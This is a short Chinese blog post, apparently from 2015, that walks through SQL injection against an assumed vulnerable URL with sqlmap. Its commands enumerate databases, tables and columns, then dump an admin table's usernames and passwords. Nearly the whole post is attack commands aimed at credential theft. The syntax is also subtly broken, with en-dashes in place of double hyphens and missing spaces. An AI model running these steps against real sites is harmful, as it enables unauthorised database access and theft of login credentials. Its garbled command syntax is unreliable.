mysql sqlmap 注入

2015-11-19 mysql

假设注入点为 http://www.abc.com/news.php?id=12
//探测数据库信息
sqlmap -u http://www.abc.com/news.php?id=12 –dbs
>db_a
>db_b
// 选择一个数据库 猜解表名
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b–tables
// 猜解表结构
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b-T sys_admin –columns 
// 猜解表内容
sqlmap -u http://www.abc.com/news.php?id=12 -D db_b -T sys_admin -C id,admin_name,pwd –dump

内容来自Myhacklife